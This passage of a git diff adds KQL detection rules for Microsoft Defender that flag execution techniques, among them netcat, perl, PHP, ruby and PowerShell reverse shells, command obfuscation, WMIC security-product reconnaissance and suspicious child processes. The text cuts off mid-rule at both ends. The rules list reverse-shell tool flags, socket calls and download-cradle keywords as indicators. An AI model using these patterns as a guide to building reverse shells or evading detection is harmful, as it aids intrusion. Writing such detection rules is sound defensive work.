"xslx." or FolderPath contains "xtpp.") and (FolderPath contains "\\u202e" or FolderPath contains "[U+202E]") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql new file mode 100644 index 00000000..42d7fd78 --- /dev/null +++ b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Netcat Reverse Shell Execution +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-07 +// Level: high +// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -e ") and (FolderPath endswith "/nc" or FolderPath endswith "/ncat") and (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh" or ProcessCommandLine contains "/bin/ash" or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/bsh" or ProcessCommandLine contains "/bin/csh" or ProcessCommandLine contains "/bin/ksh" or ProcessCommandLine contains "/bin/pdksh" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/tcsh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "$IFSash" or ProcessCommandLine contains "$IFSbash" or ProcessCommandLine contains "$IFSbsh" or ProcessCommandLine contains "$IFScsh" or ProcessCommandLine contains "$IFSksh" or ProcessCommandLine contains "$IFSpdksh" or ProcessCommandLine contains "$IFSsh" or ProcessCommandLine contains "$IFStcsh" or ProcessCommandLine contains "$IFSzsh") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql new file mode 100644 index 00000000..33cca89b --- /dev/null +++ b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Perl Reverse Shell Execution +// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-07 +// Level: high +// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "fdopen(" and ProcessCommandLine contains "::Socket::INET") or (ProcessCommandLine contains "Socket" and ProcessCommandLine contains "connect" and ProcessCommandLine contains "open" and ProcessCommandLine contains "exec")) and (ProcessCommandLine contains " -e " and FolderPath endswith "/perl") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql new file mode 100644 index 00000000..809a89fa --- /dev/null +++ b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-14 +// Level: medium +// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/Execution/potential_php_reverse_shell.kql new file mode 100644 index 00000000..db9e6038 --- /dev/null +++ b/KQL/rules/Execution/potential_php_reverse_shell.kql @@ -0,0 +1,12 @@ +// Title: Potential PHP Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 +// Level: high +// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. +Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. + +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains "ash" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "bsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "pdksh" or ProcessCommandLine contains "sh" or ProcessCommandLine contains "tcsh" or ProcessCommandLine contains "zsh") and (ProcessCommandLine contains " -r " and ProcessCommandLine contains "fsockopen") and FolderPath contains "/php" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql new file mode 100644 index 00000000..4526a676 --- /dev/null +++ b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql @@ -0,0 +1,13 @@ +// Title: Potential PowerShell Command Line Obfuscation +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) +// Date: 2020-10-15 +// Level: high +// Description: Detects the PowerShell command lines with special characters +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001 +// False Positives: +// - Amazon SSM Document Worker +// - Windows Defender ATP + +DeviceProcessEvents +| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql new file mode 100644 index 00000000..072d65ce --- /dev/null +++ b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql @@ -0,0 +1,10 @@ +// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-09 +// Level: high +// Description: Detects suspicious encoded character syntax often used for defense evasion +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ProcessCommandLine contains "[char]0x" or ProcessCommandLine contains "(WCHAR)0x" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql new file mode 100644 index 00000000..59b853a3 --- /dev/null +++ b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql @@ -0,0 +1,12 @@ +// Title: Potential Powershell ReverseShell Connection +// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - In rare administrative cases, this function might be used to check network connectivity + +DeviceProcessEvents +| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..cecef711 --- /dev/null +++ b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,15 @@ +// Title: Potential Product Class Reconnaissance Via Wmic.EXE +// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. +Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. +This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082 +// False Positives: +// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products. + +DeviceProcessEvents +| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "AntiSpywareProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..6d63984f --- /dev/null +++ b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Product Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains " uninstall" or ProcessCommandLine contains " install"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql new file mode 100644 index 00000000..afa346a8 --- /dev/null +++ b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential RDP Session Hijacking Activity +// Author: @juju4 +// Date: 2022-12-27 +// Level: medium +// Description: Detects potential RDP Session Hijacking activity on Windows systems +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql new file mode 100644 index 00000000..050501fc --- /dev/null +++ b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-30 +// Level: medium +// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql new file mode 100644 index 00000000..15309365 --- /dev/null +++ b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Renamed Rundll32 Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_ruby_reverse_shell.kql b/KQL/rules/Execution/potential_ruby_reverse_shell.kql new file mode 100644 index 00000000..1d9b0d62 --- /dev/null +++ b/KQL/rules/Execution/potential_ruby_reverse_shell.kql @@ -0,0 +1,10 @@ +// Title: Potential Ruby Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 +// Level: medium +// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh") and (ProcessCommandLine contains " -e" and ProcessCommandLine contains "rsocket" and ProcessCommandLine contains "TCPSocket") and FolderPath contains "ruby" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql new file mode 100644 index 00000000..b303daba --- /dev/null +++ b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql @@ -0,0 +1,12 @@ +// Title: Potential ShellDispatch.DLL Functionality Abuse +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: medium +// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql new file mode 100644 index 00000000..c95fcd22 --- /dev/null +++ b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql @@ -0,0 +1,13 @@ +// Title: Potential Suspicious Browser Launch From Document Reader Process +// Author: Joseph Kamau +// Date: 2024-05-27 +// Level: medium +// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed. + +DeviceProcessEvents +| where (ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")) and (not(ProcessCommandLine contains "https://go.microsoft.com/fwlink/")) and (not(((ProcessCommandLine contains "http://ad.foxitsoftware.com/adlog.php") or (ProcessCommandLine contains "https://globe-map.foxitservice.com/go.php" and ProcessCommandLine contains "do=redirect")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..e960299f --- /dev/null +++ b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql new file mode 100644 index 00000000..a7e6cfb4 --- /dev/null +++ b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql @@ -0,0 +1,12 @@ +// Title: Potential WinAPI Calls Via CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-06 +// Level: high +// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106 +// False Positives: +// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity. + +DeviceProcessEvents +| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((((ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "CloseHandle") and InitiatingProcessFolderPath endswith "\\CompatTelRunner.exe") or (ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql new file mode 100644 index 00000000..6af3f015 --- /dev/null +++ b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql @@ -0,0 +1,14 @@ +// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell +// Author: Markus Neis @Karneades +// Date: 2019-04-03 +// Level: medium +// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.t1059.001 +// False Positives: +// - AppvClient +// - CCM +// - WinRM + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_xterm_reverse_shell.kql b/KQL/rules/Execution/potential_xterm_reverse_shell.kql new file mode 100644 index 00000000..1c1b667c --- /dev/null +++ b/KQL/rules/Execution/potential_xterm_reverse_shell.kql @@ -0,0 +1,10 @@ +// Title: Potential Xterm Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-24 +// Level: medium +// Description: Detects usage of "xterm" as a potential reverse shell tunnel +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains "-display" and ProcessCommandLine endswith ":1" and FolderPath contains "xterm" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql new file mode 100644 index 00000000..4ccb7247 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Child Process Of ClickOnce Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects potentially suspicious child processes of a ClickOnce deployment application +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql new file mode 100644 index 00000000..f4afef5e --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Child Process Of VsCode +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-26 +// Level: medium +// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 +// False Positives: +// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql new file mode 100644 index 00000000..816df51d --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Child Process Of WinRAR.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: medium +// Description: Detects potentially suspicious child processes of WinRAR.exe. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql new file mode 100644 index 00000000..29371d73 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry +// Author: Ahmed Farouk, Nasreddine Bencherchali +// Date: 2024-11-01 +// Level: high +// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. +This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceRegistryEvents +| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (((RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and (RegistryValueData contains " -e " or RegistryValueData contains " -ec " or RegistryValueData contains " -en " or RegistryValueData contains " -enc " or RegistryValueData contains " -enco" or RegistryValueData contains "ftp" or RegistryValueData contains "Hidden" or RegistryValueData contains "http" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-")) or (RegistryValueData contains "wmic" and (RegistryValueData contains "shadowcopy" or RegistryValueData contains "process call create"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql new file mode 100644 index 00000000..3ff906ba --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Electron Application CommandLine +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: medium +// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage for debugging purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql new file mode 100644 index 00000000..43299eac --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Execution Of PDQDeployRunner +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-22 +// Level: medium +// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate use of the PDQDeploy tool to execute these commands + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith 